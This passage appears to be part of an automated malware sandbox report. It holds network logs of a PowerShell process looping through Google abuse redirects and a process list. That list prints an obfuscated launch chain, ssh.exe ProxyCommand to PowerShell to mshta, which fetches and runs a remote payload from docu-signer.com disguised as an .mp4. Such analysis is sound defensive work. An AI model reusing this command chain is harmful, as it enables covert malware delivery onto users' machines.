29	192.168.2.7	49961	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:33 UTC	53	OUT	GET /a/cpanel/index.js HTTP/1.1 Host: google.com
2024-12-17 07:11:34 UTC	551	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GKXIhLsGIjB6N-nyx0b0z4U7ZaKA2d6pcpb2GYUb7KRWzOt-6jfckaGprUyp0emQzHQwUaIs5-QyBj5qY25kcloBQw Date: Tue, 17 Dec 2024 07:11:34 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 382 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:34 UTC	382	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 26 61 6d 70 3b 71 3d Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49970	142.250.181.100	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:36 UTC	198	OUT	GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GKXIhLsGIjB6N-nyx0b0z4U7ZaKA2d6pcpb2GYUb7KRWzOt-6jfckaGprUyp0emQzHQwUaIs5-QyBj5qY25kcloBQw HTTP/1.1 Host: www.google.com
2024-12-17 07:11:37 UTC	614	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dd75c82985daeaff3:TM%3D1734419493:C%3D%3E:IP%3D8.46.123.189-:S%3DkltNtfgCqWczkyfoV0fD1g%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:11:33+GMT Date: Tue, 17 Dec 2024 07:11:36 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 441 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:37 UTC	441	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 3f 67 6f 6f 67 6c 65 5f 61 62 75 73 65 3d 47 4f 4f 47 4c 45 5f 41 42 55 53 45 5f 45 58 45 4d 50 54 49 4f 4e 25 33 44 49 44 25 33 44 64 37 35 63 38 32 39 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dd75c829

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49977	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:38 UTC	261	OUT	GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dd75c82985daeaff3:TM%3D1734419493:C%3D%3E:IP%3D8.46.123.189-:S%3DkltNtfgCqWczkyfoV0fD1g%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:11:33+GMT HTTP/1.1 Host: google.com
2024-12-17 07:11:40 UTC	588	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js Date: Tue, 17 Dec 2024 07:11:39 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 233 X-XSS-Protection: 0 Set-Cookie: GOOGLE_ABUSE_EXEMPTION=ID=d75c82985daeaff3:TM=1734419493:C=>:IP=8.46.123.189-:S=kltNtfgCqWczkyfoV0fD1g; path=/; domain=google.com; expires=Tue, 17-Dec-2024 10:11:33 GMT Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:40 UTC	233	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49989	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:41 UTC	53	OUT	GET /a/cpanel/index.js HTTP/1.1 Host: google.com
2024-12-17 07:11:42 UTC	551	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GK7IhLsGIjCvxkyCiJUVF_Bzf-MafVcDRQeW2hNqrhgSEQJ_B_v93rf27hWy_7yle_F6BT2ZonUyBj5qY25kcloBQw Date: Tue, 17 Dec 2024 07:11:42 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 382 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:42 UTC	382	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 26 61 6d 70 3b 71 3d Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49997	142.250.181.100	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:44 UTC	198	OUT	GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GK7IhLsGIjCvxkyCiJUVF_Bzf-MafVcDRQeW2hNqrhgSEQJ_B_v93rf27hWy_7yle_F6BT2ZonUyBj5qY25kcloBQw HTTP/1.1 Host: www.google.com
2024-12-17 07:11:45 UTC	614	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3De4ac8dc7236dfcc5:TM%3D1734419502:C%3D%3E:IP%3D8.46.123.189-:S%3DbIMAytAaSkRXdWG6Qa4ZbQ%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:11:42+GMT Date: Tue, 17 Dec 2024 07:11:45 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 441 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:45 UTC	441	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 3f 67 6f 6f 67 6c 65 5f 61 62 75 73 65 3d 47 4f 4f 47 4c 45 5f 41 42 55 53 45 5f 45 58 45 4d 50 54 49 4f 4e 25 33 44 49 44 25 33 44 65 34 61 63 38 64 63 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3De4ac8dc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	50004	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:47 UTC	261	OUT	GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3De4ac8dc7236dfcc5:TM%3D1734419502:C%3D%3E:IP%3D8.46.123.189-:S%3DbIMAytAaSkRXdWG6Qa4ZbQ%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:11:42+GMT HTTP/1.1 Host: google.com
2024-12-17 07:11:48 UTC	588	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js Date: Tue, 17 Dec 2024 07:11:48 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 233 X-XSS-Protection: 0 Set-Cookie: GOOGLE_ABUSE_EXEMPTION=ID=e4ac8dc7236dfcc5:TM=1734419502:C=>:IP=8.46.123.189-:S=bIMAytAaSkRXdWG6Qa4ZbQ; path=/; domain=google.com; expires=Tue, 17-Dec-2024 10:11:42 GMT Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:48 UTC	233	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	50014	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:50 UTC	53	OUT	GET /a/cpanel/index.js HTTP/1.1 Host: google.com
2024-12-17 07:11:51 UTC	551	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GLbIhLsGIjCxuDqUvtsLwShhV2mnWCZcd15X9Bz8fRSDQoVfsjclHpKi3pgk0bE0WrMTTNOo_TQyBj5qY25kcloBQw Date: Tue, 17 Dec 2024 07:11:50 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 382 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:51 UTC	382	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 26 61 6d 70 3b 71 3d Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	50024	142.250.181.100	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:52 UTC	198	OUT	GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GLbIhLsGIjCxuDqUvtsLwShhV2mnWCZcd15X9Bz8fRSDQoVfsjclHpKi3pgk0bE0WrMTTNOo_TQyBj5qY25kcloBQw HTTP/1.1 Host: www.google.com
2024-12-17 07:11:53 UTC	614	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D5dc1da10416f5757:TM%3D1734419510:C%3D%3E:IP%3D8.46.123.189-:S%3DOoV2nP8elc6dVEW1dL2Ffw%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:11:50+GMT Date: Tue, 17 Dec 2024 07:11:53 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 441 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:53 UTC	441	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 3f 67 6f 6f 67 6c 65 5f 61 62 75 73 65 3d 47 4f 4f 47 4c 45 5f 41 42 55 53 45 5f 45 58 45 4d 50 54 49 4f 4e 25 33 44 49 44 25 33 44 35 64 63 31 64 61 31 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D5dc1da1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	50031	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:55 UTC	261	OUT	GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D5dc1da10416f5757:TM%3D1734419510:C%3D%3E:IP%3D8.46.123.189-:S%3DOoV2nP8elc6dVEW1dL2Ffw%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:11:50+GMT HTTP/1.1 Host: google.com
2024-12-17 07:11:56 UTC	588	IN	HTTP/1.1 302 Found Location: https://google.com/a/cpanel/index.js Date: Tue, 17 Dec 2024 07:11:56 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 233 X-XSS-Protection: 0 Set-Cookie: GOOGLE_ABUSE_EXEMPTION=ID=5dc1da10416f5757:TM=1734419510:C=>:IP=8.46.123.189-:S=OoV2nP8elc6dVEW1dL2Ffw; path=/; domain=google.com; expires=Tue, 17-Dec-2024 10:11:50 GMT Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:56 UTC	233	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://google.com/a/cpanel/index.js">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	50041	172.217.17.46	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:11:58 UTC	53	OUT	GET /a/cpanel/index.js HTTP/1.1 Host: google.com
2024-12-17 07:11:59 UTC	551	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GL7IhLsGIjBA4Oq5LSboi3-Pl7bxdS0P0UbEVBVKyWh0K18E4kMMNYX0Ny8CZYGtXqSojKHMKMkyBj5qY25kcloBQw Date: Tue, 17 Dec 2024 07:11:59 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Server: HTTP server (unknown) Content-Length: 382 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 07:11:59 UTC	382	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 2f 63 70 61 6e 65 6c 2f 69 6e 64 65 78 2e 6a 73 26 61 6d 70 3b 71 3d Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	50050	142.250.181.100	443	7720	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:12:01 UTC	198	OUT	GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GL7IhLsGIjBA4Oq5LSboi3-Pl7bxdS0P0UbEVBVKyWh0K18E4kMMNYX0Ny8CZYGtXqSojKHMKMkyBj5qY25kcloBQw HTTP/1.1 Host: www.google.com

Target ID:	6
Start time:	02:10:01
Start date:	17/12/2024
Path:	C:\Windows\System32\OpenSSH\ssh.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57)" .
Imagebase:	0x7ff789870000
File size:	946'176 bytes
MD5 hash:	C05426E6F6DFB30FB78FBA874A2FF7DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	02:10:01
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	02:10:01
Start date:	17/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57)
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:10:04
Start date:	17/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4"
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
